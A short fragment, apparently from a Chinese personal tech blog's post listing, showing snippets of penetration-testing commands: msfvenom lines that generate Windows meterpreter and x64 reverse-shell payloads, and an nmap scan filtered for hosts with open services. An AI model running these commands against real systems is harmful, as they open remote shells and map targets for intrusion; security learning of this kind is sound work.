正经人谁写日记啊。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.133 LPORT=12345 >payload.bin
阅读更多 >>
#pragma section(".text") // msvenom -p windows/x64/shell_reverse_tcp lhost=X lport=Y -f c
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips